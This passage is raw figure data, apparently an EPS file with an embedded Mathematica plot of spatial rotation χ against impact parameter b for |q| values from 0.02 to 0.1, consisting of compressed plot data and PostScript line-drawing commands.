+%QwOPTg6I+z2FeWigmv3EcQUTmIcGcvu7RKjaMA8NLDFvshw4hnlo4NZjQZdW +%jmQemphpvsY7YBjz0MQV6v0elg9mHppoNeveoLEDmYcmzk0/GHijL/PQxEXh +%uhyNXsxDfrzpAR57ujMPTUzqca9fXVfmoYmhb2o/7DZhHppoPO+JqaYh89DE +%6w45//nrMg9NvBf6MBNkzEMTF98Z3a9UxDw08THf8JafgHloom5tSuICLp9+ +%f8rPd6StzEideWhi3TqxZrEy89BED8f5Az508shDEwNd327wbeORhybqhF2f +%tq+ZRx7y9RmE9Hdu4JGHJg7Jq3uyrJZHHpo4zcZCd0kVjzw0ce/X+Sucynnk +%IZ+v8fwZziU88tDESouOcrdCHnlw0aBvbqRvHo88uHi83XTju2weeXBxwfTq +%1twMHnlwcbLm9q/SdB55cDHt5rlBU1N45MFFvp2T9+EkHnlw8dQmA6/oeB55 +%cDH8nN4unTgeeXAx0/Ne56oYHnlw8cql5SEfo3nkwcVjmya3GkfyyIOLXX0m +%9T3wnUceXGzWbU8s/cojDy6WdB8w3+Ezjzy4+GDw+te/P/LIg4vWx9OCZ33g +%kQcX3wgmmce/ZR5c1N8cKXR4zTy4GCBy8C5+wTy4uK1gw4V9z5gHF98GCLrq +%PWUeXOzhHVf48hHz4OKQ08eP2D1gHlzc3vKsWfUe8+Bi28bAvy/uMA8epsVX +%aq8NZB487Mrv9sbsFvPg4f2tKh8zbzAPHkbFb7UN9GMePMzQnvZjw1XmwUO9 +%BVuPjfJlHjx0nucUL7zMPHj4ouBeVP4F5sFD4cQTsz+dYx48PLX4euutM8yD +%hzu52hVHTjEP+XUc0lbfdoJ58NDnQr27kzfz4GGu/lWzeUeZBw9DHk57PP0w +%8+BhdPnpBZMPMQ8eFo7JmjDFk3nwcNecFS0zPJgHD7+nxzfNd2Me8jnv1lJe +%vo958HDgJf3D21yZBw9t1+isOrabefBQypEW+O9kHjycXTN04aftzIOHomsj +%qrK2Mg8+ui0xDldzYR7y+9Cd8V0HbmYefAy4UHnJfiPzkN8nNrhPOuHMPOT3 +%sbbi+Z/WMQ8+frC/kdO0hnnw8b86s19Wq5mH/L543/zPtpXMg4/L591seLmc +%efAx92fuxbZlzIOPYpHD3YmOzIOPEVM6Us4vYR58FF1WM8y3Zx58XNX+NNPa +%jnnw8XifAMGZRcyDjxMnqF8pWcA8+HhS2WP2lPnMQ35fvJJ69f5c5sHH4RyL +%3lpzmAcf0xd9qdlhyzz4eFWUbJY9k3nwceDjZp+ZM5gHH826aPf+NI158NGg +%aM9Iq6nMQ/658tYp+v5k5iFAs0dzw7tNYh4C1Lh3a5P/BOYhQLcOpzVm45mH +%ALd0fNALsGEeApxun7Cl91jmIcC7pTJRMDAPATrH2W3+bwzzEGBS6C7zqP+Y +%hwA3+ElLFo9iHgL8o5TBqRjBPOTfe0uyfQ9ZMw8BxvYP5pkMZx4C7GNjFfZ6 +%KPMQoP9Tw/L5Q5iH/Hvfw8fRDYOZhwBfF6X4+FoyDwEO2NeUPGYQ8xDgs9zZ +%WDCAeQhwtNeGfWf7Mw8BRs8O7j6mH/MQoM+kdQ3lfZiHAPe47hx4ozfzEKD9 +%1GPFc3sxD/n36h7h/XgWzEOAPz73bP3cg3kIMSanydWtO/MQ4sUTGVUjuzEP +%IX7RXb6t1Yx5CLFS1yL3Q1fmIUT3wDfOB0yZh/x30/4818ldmIcQh5760CYy +%YR5CPPSpMyPNiHkI0XLryJV3DZmHEBOnJq3bZcA8hPj2L+f1ZH3mIcSI+Dgv +%Iz3mIcQFrqHSah3mIUTrETFvw7WZhxB7Buzz8JcxDyHOzR9lsF/KPITYlqGe +%YCdhHkKc/t3+ywgx85DPozM92FDEPIR4xpQf2S5kHvLX7wXeyhEwDyEunryU +%E8VnHkI8V9hd/TmPeQgxuM/PD35c5iH/3edxcI23JvPQwhGnFlvs0WAe8t/5 +%9SZX1qkzDy2M9HB+YqfGPOS/s9+VBc1UZR5aaF615MJ4Feahhd57M9tHKTMP +%Law+btIyRIl5aKGL2oIRgzjMQwvPLVxr2a+TSx5aqFbb9rpPB5c8tDCxxapv +%33YueWhh6YjlZv3auOShhYVHuv4a2MolDy3c7jkwf0gLlzy08EzQMruRzVzy +%0EK35W6fbJq45KGFuW0DNKc3cslDC78Vx6QtbOCShxYKVk1atFL+uavw0MJ3 +%JywOba3jkocWFl+J6eJZyyUP+Xq9hxy8UMMlDy0cr+kfcqeaSx5a+OitrOhd +%FZc8tLDPz+9r4iq55CFC3cSka0UVXPIQYR/D1c5K8ucKDxHOv6xhZ1TOJQ8R +%ThumNmF4GZc8RPh+bMvcefLvDQoPEc749DhnawmXPESo4pq8/1wxlzxE2COm +%0fFFEZc8RLindO/VpELmIcIt3OdzWwuYhwgLB9w50bWAeYjQr8T29cR85iG/ +%3guD52zOYx4i/Har+bNPLvMQ4X2Tl9Zfc5iHCO0GaAytzGYeIqySFv0yzmYe +%Imzt+Nx3Wpb8e9M/DxF6fGtw35vJPER40v7gvocZzEOEO9y2xGX8ZR4ilIQc +%PSL9yzxEuOqS7bpJ6cxDhJrfbdfuT2MeIowcYnTlRSrzEOPie38sylNoPWpi +%HDql++yeKcxHjJMD9qx3+sNV/L4SiTFj9PrVfsnMS4zCLocbUpNovQZiHJQb +%9Uk/ifmJsf/GH6sXJdL6u4lxn3FXb58E5ilG28lvrFPjaR4DxGjS093TJJ75 +%yq/vcOVJp9+0X63FCHc44XfimLcYI3vN61keS/OyEaPHU9fbVrHMX4x/0qe4 +%7/tF85suRpedvZ98i2H7QYwOa5MniWNongvFeHez5lr7n2x/iFG6qSwj6AfN +%10mMu33E3vXRXPr/M2LcmfLOcXw0zdtZjKFFtyaej2L7R4xTQxKm5kXS/HeI +%Uav+cvbQSLafxDjs774DRyPIw0OMF6dKPNPD2f4So9L7oNGDwsnDW4xL736x +%PvydPE6LUfy08EP6N/K4IMa9nQNdhnxj+0+Mzlofu58II4/rYoz1v7Qr/yvb +%j2Lsod3zGH4lj7tiNL/qtfXqF7Y/xVgbURTR+Jk8notxTop9+bzP7P4hn2fR +%nsPPPpFHiBi9v8ycLfnE9q8Yx7ROt3YJJY9wMdpMKNz7+yPbz2J8bRmYN/gj +%ecSJ8Zn3tbGXQtj+FqOeS6R58wfySJfP67j7tSUf2H4Xo07WyxVf3pNHgRjD +%v3Gn9XrP9r8Y59343n7qHXlUiTH54CnlhresBzHyup8/svQtebSIceIky6jw +%N6wPCfImunEGv2F9SHB5w+kF116zPiT4yajIU/M160OCI3RTi7a/Yn1I8P6B 
+%rvNyXrI+JHhmXvDbWS9ZHxLcmnd7QOgL1ocEN2+z2j/gBetDgpUOlrIbz1kf +%EhRJTs8TP2d9SHD6l/SOA89YHxLM1vXIqwtmfUjQRFY+Ym0w60OCQ66V6aY/ +%ZX3Ir0fXPmX2U9aHBK8Orov+/oT1IcGVfNmm0U9YHxJU7Xzj+OIx60OC5Q+l +%yX0fsz4k6DRo95/AR+x+KsFeTU+bTR6xPiRombYs+vJD1ocEfU+UBkgfsj4k +%aBqy/NnJB6wPCe538+XzHrA+JDiH093/8H3Wh/z6ZitPUr3P+pA/r3dw8rzH +%+pBghVvIcqV7rA8Jrg3r2ONxl/UhwdATlQ2cu6wPCRZPNz1+IIj1IcHMEVwP +%5SDWhwTx5gMrrzusDwmm3+NlaNxhfUiwR9rXTO/brA8J7ozO6SW6zfqQ4MJ+ +%M36dD2R9SHCFZuZ4g0DWhwSl16q8bgSwPiTodUWrqEcA60OC9kX3vz68xfqQ +%yH9PRlUNucX6kOAMfdd+If6sDwk6SAP6TfQnjwIJTvjoZhZ7k/UhwbFGz/Xt +%brI+JBhXku6fd4P1Id9PE/c1b77B+pBgxrQ67bbrrA8pug2fa3f0OutDik/s +%dq7Quc76kOLMhcEzA/xYH1I8YCrbaenH+pCiclBYbug11ocUc0x9fs26xvqQ +%4rqI/g8yr7I+pNhRa6W+5SrrQ37+RWeclK6yPqTo02XbwPNXWB9SvGp+jtvj +%CutDig8Ww7nXvqwPKR4/kxs71Zf1IcXYniYLM3xYH1IcvXhb3VYf1of89cu9 +%MjR8WB9SBM/lln6XWR9StN07c7bVZdaHFIc2+a2JvMT6kGJJxeHJyy6xPqS4 +%I8o2o/Ei60OKl/PcY09fZH1IsV4y06zXRdaH/HifNJs/XWB9SDFyx9M3dhdY +%H/J5j7C2rTvP+pDiO9kjvdPnWR9SXPGr5mDv86wPKf52F+K3c6wPKQq2meg6 +%nWN9SHHMqoCX7WdZH1LMU3Oec+Us60OKTpsLXYafZX1IcXF08qLEM6wPKe50 +%SF+77QzrQ4oG5zdNlp5hfcjnYf94TvBp1ocU9z27mmZ7mvUhxe4xfl2rT7E+ +%pNimOePz2VOsD7m/Wr+8wadYH3JfTumwhJOsDykeGzR0z86TrA8pJrmHb9I/ +%yfqQ4vh5zRbvT7A+pFho88pu6QnWhxS//ne9WukE60OKfbgD228fZ31IMfPS +%lZCpx1kfUvQYc+ZXpTfrQ4YXu3wruODN+pDhbmn/8yO9WR8y/HZhQlvWMdaH +%DMdm7j5/5BjrQ4ZvRjvYDTjG+pDhzqcLkhOPsj5kqPLMInX/UdaHDCP9Hkzs +%eZT1IcOS1idhMUdYHzJU35aXt+sI60OGsn6qaHaE9SHDISk7rKIPsz5k2K1o +%ydYdh1kfMpxnOrzG9DDrQ4ZDBeP+RHmxPmRoXmG/facX60O+fjX1ueZerA8Z +%+k7Xt4s5xPqQYbD5r7+uh1gfMrwQvJHb6xDrQ4b97cVWiQdZHzIcPmvBE8+D +%rA8Z3r/829jyIOtDhjru+ksyPVkfMsxcN8zllCfrQz7Pvu8jRnuyPmR4t8fg +%JeUHWB/yeW1sWuB3gPUhw6kfg/rNOMD6kKGueVpnuwfrQ4bTnxkrPfFgfchw +%WlwNd5kH60OG1qXyu4wH60OGASPqm766sz5kuMP53eqd7qwPGbo+K2ro5c76 +%kGGb106zdDfWh3z+41f7nHZjfchQeewUu3FurA8Zbnru4dq4n/Uhwz/n3oc9 +%2M/6kOHxVe+PLNvP+pCh1bCJ3jr7WR8yTHjbMjl6H+tDhhmZCYke+1gfMvy1 +%wSV/2D7Wh3y/nMsYV76X9SHDo9OOBwfsZX3I3/986F27vawP+d/r6CyU7mV9 +%aGNE04ukSFcu/h+i+QLA +% "]]}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw113lczNsbB/BpmmavZokkW7cI19ZybZfOI5VoVymKJCJbiVC3ouxLJJWI +%uOLey00JP1uYuAiFlLQo2hftm/b6DXOe7z+9pu/M+Z7n8z5zzjM6a3yXrmMy +%GIxOJQbjx1+8Ul26/o4JaJf9oZG8qCxoP7EvejblzHx8HU3Kp3Tv3KfSLrs/ +%5kC9w/0EYvLPcO7Gt230/hUSCL43zWPaZOfO/riukUvnfW4OX9lG359MLp2e +%4fRVr03W4PDjP6nkOLep5s+GVvr5O8R/ZtyTlXdaZfz8RL/5/HvkN9fQC5rB +%rXS8B0R9W1JLxsJW2ST3k886Jz4i3df91u0UtNLxn5CuwPe3dXNbZFfkn85P +%TCdX6xcp551roc97SsaeXSA7sKZFZvTz+o+cu2fBNpjcQp//nGw94u32sqJZ +%9l/nRPkTXpBj6y1fGm5vpvPJIAe1JiYnMZtlS38+8BVJ3xWvPzOqic7vNXmX +%EvnwjU6TrCzox4BviOGo0dt9UhvpfLPIRH1zkfaCRtm2H9Pze0vYlebXKrIb +%6PzfkfS0E4bpqxtkCo1sovf0TMejlnpaTzYxStlZk763Xmb58wEfiEWWzrh2 +%UT2t7wMZ+76vYOaf32Q/nuZ+Moes+8e++ILBN1pvLulmDSpNe1Yn+1lOfi7J +%2q+kW7C0jtb/kahbvitKrqiVjf0xnTF55G7pwekXd9TSPPLIxOEub9JUamXr +%vX9cn8iI7SY3hWdqaD75ZJnBKub+iTWyH6NpJOeTzZuAO/FhNc2rgESvbe6u +%saqWff8xXGcBufAx51FuSRXNr5DYvXROH+ZXJTP5OWARmRzfp7qDWUXzLCLW +%He4uddGVsp/TO/CZBCzmBH3Sr6T5FpOh/7UEZD2skL3N+nEVE6dLHZ6DNhU0 +%7xIyI377/ZCyctmwnxP8QtiJLrGTAspp/l/I4/P321R45bKfw7l/JfY7Pe5r +%XyijHqVkzICdT4JBGa2nlFyws3TUfllKfUpJsdLhEqZbKa2vlPS/D9zlWPqV +%epURrdyQ2z6Cr7TeMtKt22sTP/ML9Ssjq13q/FevKaH1l5M7ET3VshPF1LOc +%kDuSwZK0zzSPcjLX0C00qK6I+lYQ3U3SeDfNIppPBdGPdB78xaKQeleQw8KO +%x3sCCmhelWTqNqdxm6/mU/9K4mhePz4z7xPNr5K4f+v9PMj+RNdDFel6wdRM +%nJ1H86wi1zh3H52OZoNifVSR624L1xgks0GRbzXZ8i79iyyDDYr1Uk36NijX +%TStjgyLvamL6yND/VC8bFOunhlxcJ/izUMoBRf41JInt/og3lQOK9VRDLryI +%mDDVggMKj1rSvuLwQkMPDig8asn1lPDrWrs5oPCoJbuW/6vaFskBhUct0Q4X +%cFKvcUDhUUfMohOuOT3jgMKjjqiP6tSsLeKAwqOOpAdUqy1r54DC4xvRyOmX 
+%3RZwIfKnxzfya5ZdbKcuFxQe38jbm0kfpfO4oPCoJ5n9jp1jnbig8Kgn+5M4 +%9fzNXFB41JNAPe7Bin1cUHg0kKIzyeHR8VxQeDSQB8Xx18ff5oLCo4Esn9v6 +%9NIbLig8GoljSnrGYBkXFB6NJOiwh/eMHi71aCRXhwseWol41KOJbMn0Zi3S +%51GPJpImWOM8zIRHPZqIzW1OZoYTj3o0k4TR0+4s38SjHs3kaKnV8PQwHvVo +%JiwDHw+lOB71aCFWMIM1NplH62khUS9reRrPedSnhVgbGJ//XMij9bUQVePI +%wh3NPOrVQiKs1OrqWHxabwt54B+UPmUkn/q1kFcjWx1Np/Np/a3EyPjRhwlm +%fOrZSlK5r5vyXfk0j1bCuFbW5rCFT31bSalhsvf5MD7Np5W0rPhNIymGT71b +%SXH1dM2Qa3yaVxvxbw3J037Mp/5thPVCemR3Np/m10ZeXnTNiKngg+L72Ubu +%elZxt37n0zzbSO7iPZUqPAFdH21EZ6bqTXttAc23nZjbs7udpgroemknc097 +%zFcnApp3O3kxm1+xw15A1087+T1jUVCkp4Dm305m/hK/aqm/gK6ndhJ0+qHa +%w3AB9eggy2sdZ72NElCPDtJQlKsTdllAPToIz1qq/y5VQD06CPu37G1P0gXU +%o4McKw2fZ/FeQD06SEZtZLRXiYB6dJCjG7duEdULqEcnCf3rz9k23QLq0UkK +%HErbR6gIqUcn+Tt+dukmsZB6dJKsC8b3zEYLqUcn6XltrHt5opB6dJI6rvX6 +%UCMh9fhOVmUM+uTNF1KP7yQyqOvBP4uE1OM7ebvdM6zNXkg9vhPd3P2bUpcL +%qcd38m6q/5QyTyH1+E469l2Yvd9HSD26SB37zalYPyH16CLrJ++ql+4SUo8u +%EqezIHgwWEg9ukiQC+uEY7iQenSRoqilT6SHhNSji+zZ4Fv7+zEh9egmH9Sm +%2r0/IaQe3US3503em1NC6tFNJp2McjOIFlKPbjLayrKOGSukHt3k5DdG3IIz +%QurRTbQttkqb5K8VHt0E3L5bCeKE1KOH7LnrnHNOfl/h0UP+47jMuxSLHj1E +%dbxgkXYMevSQvcabWBqn0aOHzDDfueB4JHr0kD7fuqDDEejRS3Z1nq/jH0WP +%XmJw+Z3WiIPo0UtsjmnF3AsT0v2yl7wemPBLQzB69JJTUu20tF3o0UsKTQaL +%J/mjRx/JC1N78Ptm9Ogjz6Z5CLrXoUcfMbw4RcvLAz36yGpXJdtwV/ToI9yC +%m87uDujRR9JWbwvrWIwe/eTS+3y2gyl69JMvo6bl75yLHv3Ex+PTk42G6NFP +%vubv/NNwMnr0E795re45OujRT9gr8sfba6FHPzENeTGYJEKPAfIhKHKoiYMe +%A2TNeda/2kMC6jFAjpjxcmZ+F1CPATL54f63CxoF1GOA/JUOdxdUCqjHAPFe +%/+z4/M8C6jFIApqjOUY5AuoxSMIuGSye8FpAPQZJV9XacaPk32+FxyDpfMxa +%NeyegHoMkqf3v/2nkYz71SCJPrabMe4q7ldDJDUmjGt4HverIeIoOKu+7DTu +%V0Pk1OQRJYeO4n41RPr3Maa+DsP9aojcC7YyHBWI+9UQmfXilvp+P9yvGDBB +%i1U7uB7rYUD7pkTdUx64fzHAMMi9ZI4L1seASZ4uen22uJ8x4KXppLAPFgL4 +%Wa43A/ROTD3z0gT3NwbUloqO58wU0P2BAQEaVqo903C/Y0BC2JK7s/QxDwbY +%JwiXxY7F/U8+fuHBa6ojMB8G9J4rq7oswv2QATc812gv5WFeSlAyh9czion7 +%oxLMspycxOrj0/yUABqjVTkdeH4pQaL5yJLxjXyapxI0vp/DW12N55kSJI3R +%s7n7lU/zVYIp1e6dEwvxfFMCW/u7pXdy+DRvJQh+ZfjOPQvPOyXYslY8oPOS +%T/NXgm0HC58y0vH8U4KeUCLpesCnHky4t/d4GP8OnodMmLUuzW9mMp96MCGx +%57ZO8D94PjLBOfn60+LLfOrBhJXR622WXsDzkgm/ivcwq8/wqQcTtG1SNkdE +%4fnJhNa7anE2EXzqwYSooazB8YfxPGXCwemZK4ftw/6ACQsjR87QCuVTDyY8 +%VdeuNw7EfoEJSapm1T47+NRDGeIfx7Ym+2L/oAy/eV2yUd2EHspwYkdeQag3 +%eiiDkW6OWGUNeihDjdGXlxdXoocyjH2X3WazHD2U4Y1txr9qzuihDJ8fP3lW +%YY8eyuA/+GHtG2v0UAb192eVn1uihzIE2M43yjZDD2X41M1PagD0YIF63PhC +%7fnowYJXGr7PV8xBDxa8WP5r/7+/oQcL7G61HxUaogcLtoYdbv9jGnqwYPtS +%k4yByejBgojzR8Mi9NGDBcPZA+ZT9NCDBQZeB1IKx6EHCz5/U74YOxo9WLCs +%rt3McyR6sKDu2j3vOZrowYKKPz6+HquBHirQo9PDlIrRQwUCnM9HaaihhwoE +%dwY80BGghwq8rPaYO4+LHiqwt1LNxksFPVQg+6lgZCwTPVRgR88vbz8O8aiH +%ChBPVcexA9i/qkBJlaZbQC+PesjvP9FOyuviUQ8V2FXtc9q0k0c9VODwHKWZ +%D9qw32XDgb73z+e2YH/NBqXogIEXjdj/sqE0EhLc63nUgw2XN6Sf7K/FfpgN +%1rKBwqvV2I+zIS2WMcG1Evtj+Xhz42KGl/OoBxt87w0zK/6K/TIbTB24XddL +%sH9nQ9jhb9Xhn3nUgw3m1o4Fa+T9tsKDDR990q4syedRDzZ0ufZdn5eH/T4H +%1mjV+M3M5VEPDri0n1SZ/YFHPTjwNeBxKrznUQ8OJIZYDjq8xd8HHAi0LXyz +%MZNHPTiw+9n220df86gHB1zvORWnZqAHByygmXx9gR4cyDArDBz2HD04kKSf +%luvwDD04cPNzqUtMOnrI75cHZ355gh5cuKW82Xv6Y/Tgwh33tcUH0tCDC5wl +%3ZnlD9CDC8Yfnn02v48eXJCcDhtMvoseXHC9IRga/T/04ELyQG9M1G0ePT+5 +%ULv5oonqLfTgQlTK/7wjbqIHF/bYjd8iTUEPLixq+scj4QZ6cCEwM9FrWhJ6 +%yOfj98Du+XX04EHXaaWkVdfQgwftgWNeD/6NHjzY57t7deJf6MGDzQWMYuur +%6MEDr4sZ4r5E9OCBVbzm8OTL6MGDML249+v+RA8ehLfpOOlcQg8eHKpLaitL +%QA8e6OU97//rAnrwYHLMQnO/8+jBAzuN2Ffz49GDD51Z043Uz6EHH4pWm9hV +%xqEHH2xcSooen0EPPviOq4qMj0UPPvz++Oyp4Bj04EOL+Pkjz2j04ANv7Mnz +%S06jBx/e39qvNysKPfhwNXFzoP4p9ODDwI2cbdqR6MGH7sTqPZKT6MGHhfXb 
+%U4Qn0IMPnBmH7vIj0EMAq41/1RMeRw95H+HsrSk6hh7yvm3oYq/mUfQQwOxr +%Goa6R9BDAAvVHhobHEYPAUStdHY0PYQeAvC3t/BadhA95H3Rp7YNWw6ghwDq +%0z1WHNqPHvK+4tIo3Sv70EMAWrmRr/8LRw/550e/elgVhh5CMPUKuCAIQw8h +%KJtHjTHaix5CmB5XHr5yD3oIoWMo6tvRUPSQ/66asD7vQQh6CKH1jmpCQzB6 +%yPve/KHfdYLRQwgjuLVrXf9ADyE070v5cCoIPYTAE1otfxuIHvLXHZJPgkD0 +%EELgUNYU693oIYSWRP+CE7vQQxWKwtR4H3eihyo8d24pH7kTPVTB0WNayNoA +%9FCFsoHWTyk70EMV3EadujOwHT1UITmj09lmO3qowqHbK9IT/NFDFe6daE5s +%24YeqpB9vcHccht6qAIj2/fART/0UAWf6kSVHl/0UIUd43LWO/mihxp4KU27 +%mroVPdSgpj/EUbQVPdRgha5+yLYt6KEGUxP4IR83o4caXPnlatjszeihBluP +%hYYnbEIPNfBxel7F3oQearDD8V2o30b0UAP/htBzn33QQw02xD6KsPRBD/l8 +%0pd8u7sBPdRgVohV44QN6KEGUZ1/x8StRw91UJ+496lgPXqoQ16/m/9eb/RQ +%h1yp6Oz3deihDtlHvlpuXYce6mDIH7GxZi16qIPrScsBz7XooQ6/apV1lHih +%hzqUelUGunmhhzpIh91eWLQGPdRBP6NUe8Ua9JC/P+1V2WdP9FCH56OFD1d5 +%oocIGkbYnilfjfWIwFaTKd6wGn1E4P6x41GTB9YngtEtYck7PdBLBKmGUZVD +%q7BeETzYdsLh6Cr0E4Gnw+bKYauwfvn9xBdNl1eipwgkqcojDVZiHiIw0ro1 +%IJPv44rfMyKwV7pB7N0xHxFsX5yQXOaG3iLomLbXdIcb5iWCvz6Gf+W4Yf8g +%Am1vm8rzKzA/EUQZ5hwwXIHrQQRZDDXH18sxTxEEly177rkc14cI9qyWru11 +%xXxFkGtmuyDaFdeLCFaGul+f7op5i2B+t8+iTBdcPyJghbWKNrhg/iLYrR+s +%z3bB9SSCfQdYrleXoYcY1vXPyzFbhh5iOJq+p6bKGT3EUN68J+uQM3qIQbfY +%Y/RkZ/QQg1bqf5ffOqGHGD7pbyzb5oQeYuAtyPDVdEIPMawqGHPrsSN6iGFj +%+pHCtY7oIYZXupeyhI74fZO/n6/E/99S9BCD2vclh1ctRQ8xGD0ouMVdih5i +%MEzJHrjtgB5iEPeWtXs4oIe83mEuSUIH9BBDQo/6uIf26CGff2ZjyAZ79BDD +%jTDueE179BDD6+E1rS/t0EMMA8t6L++yQw8xtB62ZE6yQw/5eAHLm4ps0UMM +%Q580QyJs0UMMe6b9dgxs0UMCV3b01HXYoIcEbK80ZF+zQQ8JtAUVqnjYoIcE +%fHXemAyzQQ8JnHKZfSvTGj3k9x9ywvZZo4cE1v7x7tbv1ughgUxVu/Z2K/SQ +%wNQPX1JuWKGHBIxkxhnrrdBDAmXujdN/sUIPCSwxWGBesgQ9JHDd5eTss0vQ +%QwLvh5+86rwEPSTAMTh/TLIEPSTwarePT/Zi9JDAv4bxlScWo4cEsk5PLbBZ +%jB4SsOHMSRIuRg8JpD4dpvfWEj0k8LHZ+EiEJXpIYNSdDeNsLdFDAj47Hqap +%W6KHBLT0nmrnLEIPCVSY6dZHL0IPKVwNFX5zWYQeUri7eIqR9iL0kAJX/1dG +%qQV6SOHI5CneVyzQQwqhST1nfSzQQz7eVqn1dAv0kAJ71ZOTneboIYXHN71M +%HpmjhxQcnGM37DNHDymEWNx3tDJHDynMGLHAV2qOHlK4b7x8eLEZekjB7eMx +%vatm6CEFE+ulwVvN0EMKKddI0Gwz9JCC8dncCqYZekjB1W+4yduF6CGFywfW +%jDq7ED2kwGl69mjtQvSQwuDe2rIZC9FDCtWnvEIHTNFD/vwt7/a+MUUPKVjH +%6XLiTNFDCn9kjvmwzhQ9pFD4yiXfyBQ9NGCbumUmU/76/4f9glI= +% "]]}}, +% AspectRatio->NCache[GoldenRatio^(-1), 0.6180339887498948], +% Axes->None, +% AxesOrigin->{0, 0}, +% Epilog->{ +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.02\"", TraditionalForm]], "Text", "TR"], +% Text["|q| = 0.02"]], TraditionalForm]], {0.8, 4}, BaseStyle \ +%-> 14], +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.05\"", TraditionalForm]], "Text", "TR"], +% Text["|q| = 0.05"]], TraditionalForm]], {1.67, 6.4}, \ +%BaseStyle -> 14], +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.07\"", TraditionalForm]], "Text", "TR"], +% Text["|q| = 0.07"]], TraditionalForm]], {2.85, 12}, \ +%BaseStyle -> 14], +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.1\"", TraditionalForm]], "Text", "TR"], \ +% +% Text["|q| = 0.1"]], TraditionalForm]], {3.2, 7}, BaseStyle \ +%-> 14], Null}, +% Frame->True, +% FrameLabel->{ +% FormBox["\"Impact parameter, b\"", TraditionalForm], +% FormBox["\"Spatial rotation, \[Chi]\"", TraditionalForm]}, +% FrameStyle->{{14, +% GrayLevel[1]}, {14, +% GrayLevel[1]}}, +% FrameTicks->{Automatic, {{0, +% FormBox["0", TraditionalForm]}, { +% NCache[Pi, 3.141592653589793], +% FormBox["\[Pi]", TraditionalForm]}, { +% NCache[2 Pi, 6.283185307179586], +% FormBox[ +% 
RowBox[{"2", " ", "\[Pi]"}], TraditionalForm]}, { +% NCache[3 Pi, 9.42477796076938], +% FormBox[ +% RowBox[{"3", " ", "\[Pi]"}], TraditionalForm]}, { +% NCache[4 Pi, 12.566370614359172`], +% FormBox[ +% RowBox[{"4", " ", "\[Pi]"}], TraditionalForm]}}}, +% FrameTicksStyle->{16, 16}, +% ImageSize->600, +% PlotRange->{All, All}, +% PlotRangeClipping->True, +% PlotRangePadding->{Automatic, Automatic}, +% TicksStyle->16]], "Output", +% CellChangeTimes->{3.556953242036603*^9, {3.556953596625984*^9, \ +%3.556953702375863*^9}, {3.556953796337514*^9, 3.556953956593231*^9}, \ +%{3.556954020687426*^9, 3.556954030706046*^9}, { +% 3.558693364370013*^9, 3.5586933829491863`*^9}, \ +%{3.55869345851305*^9, 3.5586934742140837`*^9}}] +%%EndMathematicaCell +p +np 33 1 m +33 273 L +469 273 L +469 1 L +cp +clip np +p +np 35 3 m +35 271 L +467 271 L +467 3 L +cp +clip np +3.239 setmiterlimit +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +P +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +P +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +0 g +0.36 w +[ ] 0 setdash +3.25 setmiterlimit +78.19 226.892 m +78.919 226.724 L +79.648 226.555 L +80.376 226.386 L +81.105 226.217 L +81.834 226.048 L +82.562 225.878 L +83.291 225.707 L +84.02 225.537 L +84.749 225.366 L +85.477 225.194 L +86.206 225.022 L +86.935 224.85 L +87.663 224.678 L +88.392 224.505 L +89.121 224.331 L +89.849 224.158 L +90.578 223.984 L +91.307 223.809 L +92.035 223.635 L +92.764 223.459 L +93.493 223.284 L +94.221 223.108 L +94.95 222.932 L +95.679 222.755 L +96.407 222.578 L +97.136 222.4 L +97.865 222.222 L +98.593 222.044 L +99.322 221.865 L +100.051 221.686 L +100.779 221.507 L +101.508 221.327 L +102.237 221.147 L +102.965 220.966 L +103.694 220.785 L +104.423 220.604 L +105.152 220.422 L +105.88 220.24 L +106.609 220.057 L +107.338 219.874 L +108.066 219.691 L +108.795 219.507 L +109.524 219.323 L +110.252 219.138 L +110.981 218.953 L +111.71 218.767 L +112.438 218.581 L +113.167 218.395 L +113.896 218.208 L +114.624 218.021 L +115.353 217.833 L +116.082 217.645 L +116.81 217.457 L +117.539 217.268 L +118.268 217.078 L +118.996 216.889 L +119.725 216.698 L +120.454 216.508 L +121.182 216.316 L +121.911 216.125 L +122.64 215.933 L +123.368 215.74 L +124.097 215.547 L +124.826 215.354 L +125.554 215.16 L +126.283 214.965 L +127.012 214.77 L +127.741 214.575 L +128.469 214.379 L +129.198 214.183 L +129.927 213.986 L +130.655 213.789 L +131.384 213.591 L +132.113 213.392 L +132.841 213.194 L +133.57 212.994 L +134.299 212.794 L +135.027 212.594 L +135.756 212.393 L +136.485 212.192 L +137.213 211.99 L +137.942 211.787 L +138.671 211.584 L +139.399 211.38 L +140.128 211.176 L +140.857 210.972 L +141.585 210.766 L +142.314 210.56 L +143.043 210.354 L +143.771 210.147 L +144.5 209.939 L +145.229 209.731 L +145.957 209.522 L +146.686 209.313 L +147.415 209.103 L +148.144 208.893 L +148.872 208.681 L +149.601 208.47 L +150.33 208.257 L +151.058 208.044 L +151.787 207.83 L +152.516 207.616 L +153.244 207.401 L +153.973 207.185 L +154.702 206.969 L +155.43 206.752 L +156.159 206.534 L +156.888 206.316 L +157.616 206.097 L +158.345 205.877 L +159.074 205.656 L +159.802 205.435 L +160.531 205.213 L +161.26 204.99 L +161.988 204.767 L +162.717 204.542 L +163.446 204.317 L +164.174 204.092 L +164.903 203.865 L +165.632 203.638 L +166.36 203.409 L +167.089 203.181 L +167.818 202.951 L +168.547 202.72 L +169.275 202.489 L +170.004 202.256 L +170.733 202.023 L +171.461 201.789 L +172.19 201.554 L +172.919 201.318 L +173.647 201.081 
